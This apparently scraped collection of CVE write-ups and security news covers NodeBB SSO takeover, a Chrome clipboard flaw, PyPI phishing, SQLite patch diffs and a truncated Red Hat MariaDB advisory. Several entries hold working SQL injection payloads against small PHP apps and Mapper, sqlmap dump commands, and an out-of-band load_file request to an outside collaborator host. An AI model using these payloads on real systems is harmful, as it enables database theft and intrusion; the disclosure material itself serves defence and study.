NodeBB Forum Software is powered by Node.js and supports either Redis, MongoDB, or a PostgreSQL database. Due to an unnecessarily strict conditional in the code handling the first step of the SSO process, the pre-existing logic that added (and later checked) a nonce was inadvertently rendered opt-in instead of opt-out. This re-exposed a vulnerability in that a specially crafted Man-in-the-Middle (MITM) attack could theoretically take over another user account during the single sign-on process. The issue has been fully patched in version 1.17.2.

_Opera maintains both a public bug bounty program, and a private program, where security researchers can submit security issues they have found in Opera’s products for cash rewards. We like to highlight some of the issues that have been submitted, to educate the community about the types of issues they should be on the look-out for. In this post, we outline a vulnerability that was submitted to us concerning a third-party-developed software – NodeBB –_ which turned out to be a 0-day vulnerability.

In May 2021, we received a bug bounty submission from researcher Mar0uane, about a vulnerability in one of the forums we maintain, relating to an account-takeover vulnerability affecting the software’s single-sign-on module.

In the report, Mar0uane outlined that it was possible to create a single-sign-on authorization code for his own user, then trick a different user into associating their account with that auth-code, via a Cross-Site Request (a CSRF). The following instructions to reproduce the issue were given:

1.  Create two accounts; A (Attacker) and B (Victim).
2.  Sign into the attacker account, and begin the process of enabling Google SSO.
3.  Intercept the request, and retrieve the URI similar to: _https://forums.opera.com/auth/google/callback?code=XXXX_
4.  In a new browser, logged in with the victim account, navigate to the intercepted URI.

After step #4, the victim’s account is associated with the SSO account from the attacker’s account – with no user interaction needed. This also means that a foreign website can embed a frame to this URI, resulting in a logged-in user (such as an administrator) unsuspectingly being compromised, without their knowledge.

This type of vulnerability is not new, nor overly complicated. OWASP outlines this type of issue, which should be standard for many pentesters. However, what is somewhat interesting about this specific vulnerability, is that NodeBB is forum software used by thousands of users around the world. For many companies – and individuals – performing such basic tests against software may be seen as a waste of time, due to the assumption that _somebody_, _somewhere_, will have already tested for this sort of vulnerability.

According to NodeBB’s developer, this report was not the first they had heard about this issue. In June of 2018, it was reported via their bug bounty program. However, the same issue was accidentally re-introduced when that part of the code was refactored in early 2021. Effectively, Mar0uane had reported a 0-day that to us that had been un-fixed just five months earlier – showing the power of the bug bounty system both via the original report in June of 2018, and in May 2021.

In the end the vulnerability was fixed. While we normally don’t pay-out for issues found in third-party code, an exception was made in this case, and both us and NodeBB, rewarded the reporter with some cash. Ultimately, this shows that when pentesting a website, it’s worth testing your assumptions.

CVE-2022-36076: Bug Bounty Adventures: A NodeBB 0-day

A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them.
The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson.
While the

A "major" security issue in the Google Chrome web browser, as well as Chromium-based alternatives, could allow malicious web pages to automatically overwrite clipboard content without requiring any user consent or interaction by simply visiting them.

The clipboard poisoning attack is said to have been accidentally introduced in Chrome version 104, according to developer Jeff Johnson.

While the problem exists in Apple Safari and Mozilla Firefox as well, what makes the issue severe in Chrome is that the requirement for a user gesture to copy content to the clipboard is currently broken.

User gestures include selecting a piece of text and pressing Control+C (or ⌘-C for macOS) or selecting "Copy" from the context menu.

"Therefore, a gesture as innocent as clicking on a link or pressing the arrow key to scroll down the page gives the website permission to overwrite your system clipboard," Johnson noted.

The ability to substitute clipboard data poses security implications. In a hypothetical attack scenario, an adversary could lure a victim to visit a rogue landing page and rewrite the address of a cryptocurrency wallet previously copied by the target with one under their control, resulting in unauthorized fund transfers.

Alternatively, threat actors could overwrite the clipboard with a link to specially crafted websites, leading victims to download dangerous software.

"While you're navigating a web page, the page can without your knowledge erase the current contents of your system clipboard, which may have been valuable to you, and replace them with anything the page wants, which could be dangerous to you the next time you paste," Johnson explained.

Google is already aware of the issue and a patch is expected to be released soon, given the seriousness of the flaw and the likelihood of abuse by malicious actors.

In the interim, users are advised to refrain from opening web pages between any cut/copy and paste actions and verify their clipboard before carrying out sensitive operations on the web, such as financial transactions.

The development comes as Google released a new version of Chrome (105.0.5195.52/53/54) for Windows, macOS, and Linux with fixes for 24 shortcomings, 10 of which relate to use-after-free bugs in Network Service, WebSQL, WebSQL, PhoneHub, among others.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Chrome Bug Lets Sites Silently Overwrite System Clipboard Content

Garage Management System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the brand_name parameter at /brand.php.

About one week ago, author mayurik released **Garage Management System 1.0** on https://sourcecodester.com. The web application has a lot of vulnerabilities, so let’s take a look at some of them.

**Vendor Homepage:** https://www.sourcecodester.com/users/mayurik 

**Software Link:** **https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html**

**Version:** 1.0

**Test Environment:** Ubuntu 22.04 + Apache2

**Sample Vulnerability 1:**

**Vulnerability**: Persistent Cross-site Scripting

**Component**: Parameter “brand\_name” in /brand.php

**Credits**: Russell Shen

**Cause:** There is no user input sanitization on parameter “brand\_name”.

**Simple PoC**:

**Screenshot of Exploitation:**

**Sample Vulnerability 2:**

**Vulnerability**: SQL Injection

**Component**: Parameter “id” in /print.php

**Credits**: Russell Shen

**Cause:** There is no user input sanitization on parameter “id”.

**Simple PoC**:

http://hostname:port/garage/print.php?id=1 ’\[SQL Query\]

**Screenshot of Exploitation:**

**Sample Vulnerability 3:**

**Vulnerability**: Persistent Cross-site Scripting

**Component**: Parameter “name” in /client.php

**Credits:** Chengcheng Tian, Russell Shen

**Cause:** There is no user input sanitization on parameter “name”.

**Simple PoC**:

**Screenshot of Exploitation:**

**Sample Vulnerability 4:**

**Vulnerability**: Bad Access Control

**Component**: Parameter “brand\_name” in /brand.php

**Credit:** Chengcheng Tian, Russell Shen

**Cause:** /print.php does not verify authentication and authorization.

**Simple PoC**:

Access http://hostname:port/print.php?id=2

**Screenshot of Exploitation:**

Post Views: 41

CVE-2022-36637: Vulnerability of Garage Management System 1.0

Clinic's Patient Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pms/update_patient.php.

Permalink

Cannot retrieve contributors at this time

**Clinic's Patient Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author： lendme1996

vendors: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

Vulnerability File: /pms/update\_patient.php?id=

Vulnerability location: /pms/update\_patient.php?id=, id

dbname = pms\_db

\[+\] Payload: /pms/update\_patient.php?id=-1%20union%20select%201,2,database(),4,5,6,7--+ // Leak place ---> id

GET /pms/update\_patient.php?id\=\-1%20union%20select%201,2,database(),4,5,6,7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=odknb2obdq1nkaqk7p7u8hvli8
Connection: close

CVE-2022-36609: bug_report/SQLi-1.md at main · Lendme1996/bug_report

Mapper v4.0.0 to v4.2.0 was discovered to contain a SQL injection vulnerability via the ids parameter at the selectByIds function.

Write the following test demo：  
1、UserController.java：  
@controller  
public class UserController {

    @Autowired
    UserService userService;
    
    @RequestMapping("gets")
    @ResponseBody
    public List<User> getUser(String ids) {
        List<String> idList = Arrays.asList(ids.split(","));
    
        return userService.gets(idList);
    }
    

}  
2、UserService.java：  
@service  
public interface UserService {

    List<User> gets(Collection<String> ids);
    

}  
3、UserServiceImpl.java：  
@service  
public class UserServiceImpl implements UserService {

    @Autowired
    UserMapper userMapper;
    
    @Override
    public List<User> gets(Collection<String> ids) {
        if (ids == null || ids.isEmpty())
            return new ArrayList<>();
        String concatIds = StringUtils.concat(ids, "'", ",");
        return (List<User>) userMapper.selectByIds(concatIds);
    }
    

}  
4、UserMapper.java：  
@org.apache.ibatis.annotations.Mapper  
public interface UserMapper extends Mapper, MySqlMapper, IdsMapper {

}  
5、Access the /gets route in the above demo for sql injection attack：  
（1）Under normal circumstances, when the ids parameter value is passed in 1, 2, the data with id 1 and 2 can be obtained：  
  
（2）But when the ids parameter value is 1') or 1=1-- -, you can get all the data in the database：

CVE-2022-36594: selectByIds function sql injection · Issue #862 · abel533/Mapper

Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the component /dishes.php?res_id=.

\# Online Food Ordering System Unauthenticated Sql Injection \* Exploit Date: 7/25/2022 \* Exploit Author: Leu Xuan Hieu # Exploit \* Injection Point => \`/dishes.php?res\_id=\` !\[\](https://i.imgur.com/qdPtouQ.jpg) \* Used Burp Suite capture request then save as \`food.txt\` \`\`\`python= python3 sqlmap.py -r food.txt -batch -current-db \`\`\` !\[\](https://i.imgur.com/kLRKlCD.png) \`\`\`python= python3 sqlmap.py -r food.txt -batch -D onlinefoodphp -tables \`\`\` !\[\](https://i.imgur.com/36uDA3J.png) \`\`\`python= python3 sqlmap.py -r food.txt -batch -columns -D onlinefoodphp -T admin -dump \`\`\` !\[\](https://i.imgur.com/J4SlcXJ.png) # POC \* Request \`\`\`python= GET /OnlineFood/dishes.php?res\_id=4'%2b(select%20load\_file('%5c%5c%5c%5c1ik2qvhgl8xqcydf43rujd4j6ac302otrhi48sx.oastify.com%5c%5cztc'))%2b' HTTP/1.1 Host: 192.168.1.101:8888 Cookie: PHPSESSID=311teftqpf9mla9pmac7o6sfq7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/OnlineFood/ Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Connection: close Cache-Control: max-age=0 \`\`\`

CVE-2022-36759: Online Food Ordering System Unauthenticated Sql Injection - HackMD

"JuiceLedger" has escalated a campaign to distribute its information stealer by now going after developers who published code on the widely used Python code repository.

Security researchers have identified a previously unknown group dubbed "JuiceLedger" as the threat actor behind a recent and first-known phishing campaign specifically targeting users of the Python Package Index (PyPI).

The threat actor first surfaced early this year and is focused on distributing a .NET-based malware called JuiceStealer for searching and stealing browser and cryptocurrency-related information from infected systems.

Initially, JuiceLedger distributed the information stealer via fraudulent Python installer applications. But starting in August, researchers from SentinelOne and Checkmarx observed the attacker also engaged in attempts to poison Python packages on the PyPI repository — presumably to distribute its malware to a wider audience.

The threat actor's modus operandi has involved targeting PyPI users with a phishing email informing them about Google implementing a new validation process for packages published on PyPI. The email claimed the measure was in response to a big increase in malicious PyPI packages getting uploaded to the registry. It warned developers to expeditiously validate their code packages with Google to avoid having them removed from the registry. "Packages not validated before September will be removed promptly," the phishing email noted.

PyPI users who clicked on the link were directed to a webpage, spoofed to look exactly like PyPI's login page. When users entered their credentials there, the page was designed to send that information to a JuiceLedger-controlled domain (linkedopports\[dot\]com). The caper appears to have convinced at least two developers to part with their credentials, which gave JuiceLedger a way to access and poison their relatively widely used PyPI packages with malicious code.

One of the infected packages (version 0.1.6 of "exotel"), for instance, had more than 480,000 total downloads at the time it was infected. The other package (versions 2.0.2 and 4.0.2 of "spam") had some 200,000 downloads. PyPI administrators have since removed both packages, according to Checkmarx.

When installed in a development environment, the code can search for Google Chrome passwords, query Chrome SQLite files, and launch a Python installer contained in the zip named “config.exe," SentinelOne said. The infostealer also looks for logs that contain the word "vault," likely because it is searching for cryptocurrency vaults, and reports the information back to an attacker-controlled command-and-control server over HTTP.

**Broad Campaign**

PyPI admins have also removed "several hundred" typosquatted packages that JuiceLedger published to PyPI as part of a broader effort to distribute its infostealer via the popular Python code repository, both SentinelOne and Checkmarx noted. Their analysis showed the threat actors had inserted a short code snippet in the packages for retrieving a signed variant of JuiceStealer from an attacker-controller URL and executing it.

The code in the typosquatted packages was similar to the code that JuiceLedger had inserted into the two legitimate code packages via its phishing campaign. The attacker-controlled URL that the typosquatted packages communicated with was also the same as the same the one that the poisoned versions of "exotel" and "spam" packages communicated. This allowed researchers at SentinelOne and Checkmarx to conclude JuiceLedger was responsible for both, the PyPI phishing campaign and for uploading the typosquatted packages to PyPI.

JuiceLedger's attack on PyPI in August represents a dangerous escalation in the threat actor's efforts to distribute its information stealer, SentinelOne said. "In August 2022, the threat actor engaged in poisoning open-source packages as a way to target a wider audience with the infostealer through a supply chain attack, raising the threat level posed by this group considerably."

**Popular — but Not the Only — Target**

PyPI recently has become a popular target for attackers trying to poison software supply chains. Countless organizations use the code published in the repository to build their applications. So, by poisoning packages on the registry, attackers can potentially reach a wide audience with relatively little effort. Recent examples include threat actors inserting malicious package installation code in 10 packages published to PyPI, another incident where some 300 developers inadvertently downloaded a package for installing Cobalt Strike from the registry and one where a school-age hacker uploaded ransomware to the registry to see what would transpire.

PyPI is by far not the only code repository that attackers have targeted recently. Security vendors have reported numerous similar incidents involving other widely used registries such as npm and Maven Central. The trend has heightened attention on software supply chain security issues, especially because of the potential for nation-state backed adversaries — like the Russian threat actor behind the SolarWinds compromise — exploiting the same tactic in their attack campaigns.

Attackers are taking advantage of the fact that developers and organizations will always need to use open source packages, says Amitai Ben, threat intelligence researcher at SentinelOne.

The best way to minimize exposure for those contributing open source code to public repositories is to enable two-factor authentication (2FA) on their user account in package managers. That minimizes the risk of account takeover by malicious actors.

Users of open source packages, meanwhile, need to know that popular packages are often connected to Git repositories from which the development process is taking place. "Discrepancies between the repository and the package on the package manager can be a sign of suspicious activity and account takeover," Ben says.

Threat Actor Phishing PyPI Users Identified

In SQlite 3.31.1, a potential null pointer derreference was found in the INTERSEC query processing.

2802
2803
2804
2805
2806
2807
2808

2809
2810
2811
2812
2813
2814
2815

        }
        sqlite3ExprDelete(db, p->pLimit);
        p->pLimit = pLimit;
  
        /\* Generate code to take the intersection of the two temporary
        \*\* tables.
        \*/

        assert( p->pEList );
        iBreak = sqlite3VdbeMakeLabel(pParse);
        iCont = sqlite3VdbeMakeLabel(pParse);
        computeLimitRegisters(pParse, p, iBreak);
        sqlite3VdbeAddOp2(v, OP\_Rewind, tab1, iBreak); VdbeCoverage(v);
        r1 = sqlite3GetTempReg(pParse);
        iStart = sqlite3VdbeAddOp2(v, OP\_RowData, tab1, r1);

>

2802
2803
2804
2805
2806
2807
2808
2809
2810
2811
2812
2813
2814
2815
2816

        }
        sqlite3ExprDelete(db, p->pLimit);
        p->pLimit = pLimit;
  
        /\* Generate code to take the intersection of the two temporary
        \*\* tables.
        \*/
        if( rc ) break;        assert( p->pEList );
        iBreak = sqlite3VdbeMakeLabel(pParse);
        iCont = sqlite3VdbeMakeLabel(pParse);
        computeLimitRegisters(pParse, p, iBreak);
        sqlite3VdbeAddOp2(v, OP\_Rewind, tab1, iBreak); VdbeCoverage(v);
        r1 = sqlite3GetTempReg(pParse);
        iStart = sqlite3VdbeAddOp2(v, OP\_RowData, tab1, r1);

CVE-2020-35525: SQLite: Check-in [a67cf5b7]

In SQLite 3.31.1, there is an out of bounds access problem through ALTER TABLE for views that have a nested FROM clause.

5141
5142
5143
5144
5145
5146
5147
5148
5149
5150
5151
5152
5153
5154
5155

              }
            }else{
              pExpr = pRight;
            }
            pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
            sqlite3TokenInit(&sColname, zColname);
            sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
            if( pNew && (p->selFlags & SF\_NestedFrom)!=0 ){              struct ExprList\_item \*pX = &pNew->a\[pNew->nExpr-1\];
              sqlite3DbFree(db, pX->zEName);
              if( pSub ){
                pX->zEName = sqlite3DbStrDup(db, pSub->pEList->a\[j\].zEName);
                testcase( pX->zEName==0 );
              }else{
                pX->zEName = sqlite3MPrintf(db, "%s.%s.%s",

|

5141
5142
5143
5144
5145
5146
5147
5148
5149
5150
5151
5152
5153
5154
5155

              }
            }else{
              pExpr = pRight;
            }
            pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
            sqlite3TokenInit(&sColname, zColname);
            sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
            if( pNew && (p->selFlags & SF\_NestedFrom)!=0 && !IN\_RENAME\_OBJECT ){              struct ExprList\_item \*pX = &pNew->a\[pNew->nExpr-1\];
              sqlite3DbFree(db, pX->zEName);
              if( pSub ){
                pX->zEName = sqlite3DbStrDup(db, pSub->pEList->a\[j\].zEName);
                testcase( pX->zEName==0 );
              }else{
                pX->zEName = sqlite3MPrintf(db, "%s.%s.%s",

CVE-2020-35527: SQLite: Check-in [c431b3fd]

Red Hat Security Advisory 2022-6306-01 - MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL. Issues addressed include buffer overflow and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: rh-mariadb103-galera and rh-mariadb103-mariadb security and bug fix update  
Advisory ID:       RHSA-2022:6306-01  
Product:           Red Hat Software Collections  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6306  
Issue date:        2022-09-01  
CVE Names:         CVE-2021-46659 CVE-2021-46661 CVE-2021-46663  
                   CVE-2021-46664 CVE-2021-46665 CVE-2021-46668  
                   CVE-2021-46669 CVE-2022-21427 CVE-2022-24048  
                   CVE-2022-24050 CVE-2022-24051 CVE-2022-24052  
                   CVE-2022-27376 CVE-2022-27377 CVE-2022-27378  
                   CVE-2022-27379 CVE-2022-27380 CVE-2022-27381  
                   CVE-2022-27383 CVE-2022-27384 CVE-2022-27386  
                   CVE-2022-27387 CVE-2022-27445 CVE-2022-27447  
                   CVE-2022-27448 CVE-2022-27449 CVE-2022-27452  
                   CVE-2022-27456 CVE-2022-27458 CVE-2022-31622  
                   CVE-2022-31623 CVE-2022-32083 CVE-2022-32085  
                   CVE-2022-32087 CVE-2022-32088  
====================================================================  
1. Summary:

An update for rh-mariadb103-galera and rh-mariadb103-mariadb is now  
available for Red Hat Software Collections.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - ppc64le, s390x, x86_64  
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

MariaDB is a multi-user, multi-threaded SQL database server. For all  
practical purposes, MariaDB is binary-compatible with MySQL.

The following packages have been upgraded to a later upstream version:  
rh-mariadb103-galera (25.3.35), rh-mariadb103-mariadb (10.3.35).

Security Fix(es):

* mariadb: MariaDB through 10.5.9 allows attackers to trigger a  
convert_const_to_int use-after-free when the BIGINT data type is used  
(CVE-2021-46669)

* mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
(CVE-2022-21427)

* mariadb: lack of proper validation of the length of user-supplied data  
prior to copying it to a fixed-length stack-based buffer (CVE-2022-24048)

* mariadb: lack of validating the existence of an object prior to  
performing operations on the object (CVE-2022-24050)

* mariadb: lack of proper validation of a user-supplied string before using  
it as a format specifier (CVE-2022-24051)

* mariadb: CONNECT storage engine heap-based buffer overflow  
(CVE-2022-24052)

* mariadb: assertion failure in Item_args::walk_arg (CVE-2022-27376)

* mariadb: use-after-poison when complex conversion is involved in blob  
(CVE-2022-27377)

* mariadb: server crash in create_tmp_table::finalize (CVE-2022-27378)

* mariadb: server crash in component arg_comparator::compare_real_fixed  
(CVE-2022-27379)

* mariadb: server crash at my_decimal::operator= (CVE-2022-27380)

* mariadb: server crash at Field::set_default via specially crafted SQL  
statements (CVE-2022-27381)

* mariadb: use-after-poison in my_strcasecmp_8bit() of ctype-simple.c  
(CVE-2022-27383)

* mariadb: crash via component Item_subselect::init_expr_cache_tracker  
(CVE-2022-27384)

* mariadb: server crashes in query_arena::set_query_arena upon SELECT from  
view (CVE-2022-27386)

* mariadb: assertion failures in decimal_bin_size (CVE-2022-27387)

* mariadb: assertion failure in compare_order_elements (CVE-2022-27445)

* mariadb: use-after-poison in Binary_string::free_buffer (CVE-2022-27447)

* mariadb: crash in multi-update and implicit grouping (CVE-2022-27448)

* mariadb: assertion failure in sql/item_func.cc (CVE-2022-27449)

* mariadb: assertion failure in sql/item_cmpfunc.cc (CVE-2022-27452)

* mariadb: assertion failure in VDec::VDec at /sql/sql_type.cc  
(CVE-2022-27456)

* mariadb: use-after-poison in Binary_string::free_buffer (CVE-2022-27458)

* mariadb: improper locking due to the unreleased lock in  
extra/mariabackup/ds_compress.cc (CVE-2022-31622)

* mariadb: improper locking due to the unreleased lock in  
extra/mariabackup/ds_compress.cc (CVE-2022-31623)

* mariadb: server crash at Item_subselect::init_expr_cache_tracker  
(CVE-2022-32083)

* mariadb: server crash in Item_func_in::cleanup/Item::cleanup_processor  
(CVE-2022-32085)

* mariadb: server crash in Item_args::walk_args (CVE-2022-32087)

* mariadb: segmentation fault in  
Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort  
(CVE-2022-32088)

* mariadb: Crash executing query with VIEW, aggregate and subquery  
(CVE-2021-46659)

* mariadb: MariaDB allows an application crash in find_field_in_tables and  
find_order_in_list via an unused common table expression (CTE)  
(CVE-2021-46661)

* mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application  
crash via certain SELECT statements (CVE-2021-46663)

* mariadb: MariaDB through 10.5.9 allows an application crash in  
sub_select_postjoin_aggr for a NULL value of aggr (CVE-2021-46664)

* mariadb: MariaDB through 10.5.9 allows a sql_parse.cc application crash  
because of incorrect used_tables expectations (CVE-2021-46665)

* mariadb: MariaDB through 10.5.9 allows an application crash via certain  
long SELECT DISTINCT statements (CVE-2021-46668)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* [Tracker] Rebase to Galera 25.3.35 for MariaDB-10.3 (BZ#2107054)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the MariaDB server daemon (mysqld) will be  
restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2049302 - CVE-2021-46659 mariadb: Crash executing query with VIEW, aggregate and subquery  
2050017 - CVE-2021-46661 mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE)  
2050022 - CVE-2021-46663 mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT statements  
2050024 - CVE-2021-46664 mariadb: MariaDB through 10.5.9 allows an application crash in sub_select_postjoin_aggr for a NULL value of aggr  
2050026 - CVE-2021-46665 mariadb: MariaDB through 10.5.9 allows a sql_parse.cc application crash because of incorrect used_tables expectations  
2050032 - CVE-2021-46668 mariadb: MariaDB through 10.5.9 allows an application crash via certain long SELECT DISTINCT statements  
2050034 - CVE-2021-46669 mariadb: MariaDB through 10.5.9 allows attackers to trigger a convert_const_to_int use-after-free when the BIGINT data type is used  
2068211 - CVE-2022-24052 mariadb: CONNECT storage engine heap-based buffer overflow  
2068233 - CVE-2022-24051 mariadb: lack of proper validation of a user-supplied string before using it as a format specifier  
2068234 - CVE-2022-24048 mariadb: lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer  
2069833 - CVE-2022-24050 mariadb: lack of validating the existence of an object prior to performing operations on the object  
2074817 - CVE-2022-27376 mariadb: assertion failure in Item_args::walk_arg  
2074947 - CVE-2022-27377 mariadb: use-after-poison when complex conversion is involved in blob  
2074949 - CVE-2022-27378 mariadb: server crash in create_tmp_table::finalize  
2074951 - CVE-2022-27379 mariadb: server crash in component arg_comparator::compare_real_fixed  
2074966 - CVE-2022-27380 mariadb: server crash at my_decimal::operator2074981 - CVE-2022-27381 mariadb: server crash at Field::set_default via specially crafted SQL statements  
2074996 - CVE-2022-27383 mariadb: use-after-poison in my_strcasecmp_8bit() of ctype-simple.c  
2074999 - CVE-2022-27384 mariadb: crash via component Item_subselect::init_expr_cache_tracker  
2075005 - CVE-2022-27386 mariadb: server crashes in query_arena::set_query_arena upon SELECT from view  
2075006 - CVE-2022-27387 mariadb: assertion failures in decimal_bin_size  
2075691 - CVE-2022-27445 mariadb: assertion failure in compare_order_elements  
2075693 - CVE-2022-27447 mariadb: use-after-poison in Binary_string::free_buffer  
2075694 - CVE-2022-27448 mariadb: crash in multi-update and implicit grouping  
2075695 - CVE-2022-27449 mariadb: assertion failure in sql/item_func.cc  
2075697 - CVE-2022-27456 mariadb: assertion failure in VDec::VDec at /sql/sql_type.cc  
2075700 - CVE-2022-27458 mariadb: use-after-poison in Binary_string::free_buffer  
2076145 - CVE-2022-27452 mariadb: assertion failure in sql/item_cmpfunc.cc  
2082644 - CVE-2022-21427 mysql: Server: FTS unspecified vulnerability (CPU Apr 2022)  
2092354 - CVE-2022-31622 mariadb: improper locking due to the unreleased lock in extra/mariabackup/ds_compress.cc  
2092360 - CVE-2022-31623 mariadb: improper locking due to the unreleased lock in extra/mariabackup/ds_compress.cc  
2104425 - CVE-2022-32083 mariadb: server crash at Item_subselect::init_expr_cache_tracker  
2104431 - CVE-2022-32085 mariadb: server crash in Item_func_in::cleanup/Item::cleanup_processor  
2104434 - CVE-2022-32087 mariadb: server crash in Item_args::walk_args  
2106008 - CVE-2022-32088 mariadb: segmentation fault in Exec_time_tracker::get_loops/Filesort_tracker::report_use/filesort

6. Package List:

Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-mariadb103-galera-25.3.35-1.el7.src.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.src.rpm

ppc64le:  
rh-mariadb103-galera-25.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.ppc64le.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.ppc64le.rpm

s390x:  
rh-mariadb103-galera-25.3.35-1.el7.s390x.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-connect-engine-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-debuginfo-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-devel-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-errmsg-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-gssapi-server-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-oqgraph-engine-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-galera-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-galera-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-utils-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-server-utils-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-syspaths-10.3.35-1.el7.s390x.rpm  
rh-mariadb103-mariadb-test-10.3.35-1.el7.s390x.rpm

x86_64:  
rh-mariadb103-galera-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-galera-debuginfo-25.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-backup-syspaths-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-common-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-10.3.35-1.el7.x86_64.rpm  
rh-mariadb103-mariadb-config-syspaths-10.3.35-1.el7.x86_64.rpm  
